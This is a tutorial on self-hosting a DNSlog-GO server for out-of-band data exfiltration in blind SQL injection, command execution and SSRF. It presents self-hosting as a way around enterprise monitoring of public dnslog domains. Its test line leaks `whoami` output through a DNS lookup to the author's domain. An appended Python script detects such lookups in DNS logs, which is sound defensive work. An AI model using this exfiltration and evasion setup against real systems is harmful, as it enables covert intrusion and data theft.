Introduction to DNSlog
In some cases a vulnerability can be triggered but no echo (visible output) comes back. If the target can still send DNS requests, the data you want can be carried out inside a DNS query and read from the DNS log.
DNS logs are often used in the following situations:
- SQL blind injection
- Command execution without echo
- SSRF without echo
There are many public dnslog services on the Internet, such as dnslog.cn, Zhichuangyu, Clover, etc., but the domain names these services provide are fixed, and some larger enterprises now include those domain names in their monitoring scope.
Building your own dnslog service on your own domain avoids this situation.
What you need
- An Alibaba Cloud domain name
- One VPS server
DNS records
Add an A record and an NS record under bigwulong.cn. The A record points to the VPS IP address, and the NS record points to the hostname of that A record, so that DNS queries for the dnslog subdomain are delegated to the VPS.
Obtaining the software
DNSlog-GO is a dnslog server written in Go. It ships with its own web interface, which can be customized, edited, modified and restyled. It runs on Linux, macOS, Windows and other systems; each platform build can be downloaded and run directly without installing dependencies. Linux is used as the example here.
Github address: https://github.com/lanyi1998/DNSlog-GO/releases/
Download address of this site (Linux DNSlog-GO version 1.5.6): https://resource.if010.com/DNSlog-GO/dnslog-linux.zip
Download address of this site (MacOS DNSlog-GO version 1.5.6): https://resource.if010.com/DNSlog-GO/dnslog-macos.zip
Download address of this site (Windows DNSlog-GO version 1.5.6): https://resource.if010.com/DNSlog-GO/dnslog-windows.zip
Run
Modify the default token
[root@localhost ~]# vim config.yaml
HTTP:
  port: 8000
  # {"token": "subdomain assigned to that user"}
  user: {
    "123456": "logdns" }
  consoleDisable: false
Dns:
  domain: bigwulong.cn
Start up
[root@localhost ~]# ./dnslog-linux &
2023/07/14 07:09:39 Http Listing Start...
2023/07/14 07:09:39 Http address: http://0.0.0.0:8000
2023/07/14 07:09:39 DNS Listing Start...
Check the process and listening ports
[root@kr-seoul ~]# ps aux | grep dnslog
root 3275 0.0 0.6 714196 6160 pts/0 Sl 07:09 0:00 ./dnslog-linux
root 3296 0.0 0.0 112808 976 pts/0 R+ 07:11 0:00 grep --color=auto dnslog
[root@kr-seoul ~]# netstat -tnlpu | grep -E '8000|53'
tcp6 0 0 :::8000 :::* LISTEN 3275/./dnslog-linux
udp6 0 0 :::53 :::* 3275/./dnslog-linux
Test
Web page access test: you need to enter the token. The token here is the value set in config.yaml.
Click to copy the random subdomain, which here is spmkj.dnslog.bigwulong.cn
Trigger a lookup with the ping command
[root@localhost ~]# ping `whoami`.spmkj.dnslog.bigwulong.cn -c 1
PING root.spmkj.dnslog.bigwulong.cn (127.0.0.1) 56(84) bytes of data.
64 bytes from kr-seoul.if010.com (127.0.0.1): icmp_seq=1 ttl=64 time=0.023 ms
--- root.spmkj.dnslog.bigwulong.cn ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.023/0.023/0.023/0.000 ms
The query for root.spmkj.dnslog.bigwulong.cn now appears in the DNSlog web console: this is the "echo" obtained through DNS.
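The monitoring mentioned earlier (enterprises watching for queries to known dnslog domains) and the test lookup above are two sides of the same thing: a leaked value ends up as the leftmost label of a query name under a domain the attacker controls. The following Python is an added example written for this page, not code from the original post or from DNSlog-GO. It shows how a defender can run simple heuristics over DNS query logs: a watch list of known dnslog domains, plus shape-based checks (deep subdomains, long or high-entropy leftmost labels) for self-hosted domains that will never be on any list. The log format, the domain list, the thresholds and the sample log lines are all constructed assumptions; bigwulong.cn from the walkthrough is included only to show why a fixed list alone is not enough.

```python
"""Flag DNS queries that look like dnslog / out-of-band lookups.

Added example for this page (not code from the original post or from
DNSlog-GO). Input format, domain list, thresholds and the sample log
lines below are all constructed assumptions for illustration.
"""
import math
from collections import Counter

# Constructed watch list: the public dnslog.cn named in the post plus the
# self-hosted bigwulong.cn from the walkthrough. Self-hosted domains will
# normally NOT be on such a list, which is why the shape checks exist.
KNOWN_DNSLOG_DOMAINS = {"dnslog.cn", "bigwulong.cn"}

MIN_LABELS_FOR_DEEP = 4   # e.g. root.spmkj.dnslog.bigwulong.cn (5 labels)
LONG_LABEL_LEN = 20       # hex/base32 data chunks tend to be long
HIGH_ENTROPY_BITS = 3.5   # bits per character; ordinary hostnames sit lower
STRONG_REASONS = {"known_dnslog_domain", "encoded_looking_label"}

# Constructed sample log lines: "<date> <time> <client_ip> <qname> <qtype>".
SAMPLE_LOG = [
    "2023/07/14 07:12:01 10.0.0.5 root.spmkj.dnslog.bigwulong.cn A",
    "2023/07/14 07:12:03 10.0.0.5 www.example.com A",
    "2023/07/14 07:12:05 10.0.0.7 4a6f686e.abcd.dnslog.cn A",
    "2023/07/14 07:12:09 10.0.0.9 mail.example.com MX",
    "2023/07/14 07:12:11 10.0.0.5 68656c6c6f2d776f726c642d313233.t1.oob-example.net A",
]


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character of a single DNS label."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def registrable_domain(qname: str) -> str:
    """Naive 'last two labels' approximation (assumption for this example);
    production code should consult a public-suffix list."""
    return ".".join(qname.split(".")[-2:])


def parse_line(line: str):
    """Parse one constructed log line into a dict, or None if malformed."""
    parts = line.split()
    if len(parts) < 5:
        return None
    date, time, client, qname, qtype = parts[:5]
    return {"ts": f"{date} {time}", "client": client,
            "qname": qname.rstrip(".").lower(), "qtype": qtype}


def classify(qname: str, known=KNOWN_DNSLOG_DOMAINS) -> list:
    """Return the reasons a query name looks like an out-of-band lookup."""
    reasons = []
    if any(qname == d or qname.endswith("." + d) for d in known):
        reasons.append("known_dnslog_domain")
    labels = qname.split(".")
    if len(labels) >= MIN_LABELS_FOR_DEEP:
        reasons.append("deep_subdomain")   # supporting evidence only
    leftmost = labels[0]
    if len(leftmost) >= LONG_LABEL_LEN or shannon_entropy(leftmost) > HIGH_ENTROPY_BITS:
        reasons.append("encoded_looking_label")
    return reasons


def scan(lines) -> list:
    """Return (client, qname, reasons) for each query with at least one
    strong reason; depth alone is too noisy (CDNs) to alert on by itself."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec["qname"])
        if STRONG_REASONS & set(reasons):
            alerts.append((rec["client"], rec["qname"], reasons))
    return alerts


def unique_subdomains_per_base(lines) -> dict:
    """Count distinct names under each registrable domain. One lookup per
    leaked value shows up as many unique names under a single base domain,
    even when none of the per-query checks fire."""
    seen = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        seen.setdefault(registrable_domain(rec["qname"]), set()).add(rec["qname"])
    return {base: len(names) for base, names in seen.items()}


if __name__ == "__main__":
    for client, qname, reasons in scan(SAMPLE_LOG):
        print(f"ALERT {client} {qname} {','.join(reasons)}")
    print(unique_subdomains_per_base(SAMPLE_LOG))
```

Of the five constructed lines, the two under watch-listed domains and the one with a 30-character hex label are flagged, while www.example.com and mail.example.com are not. The `unique_subdomains_per_base` count is the check that matters most against a self-hosted server like the one in this walkthrough: the domain is unknown and the labels may be short (as `root` is), but a stream of never-repeated names under one base domain is still visible in the log.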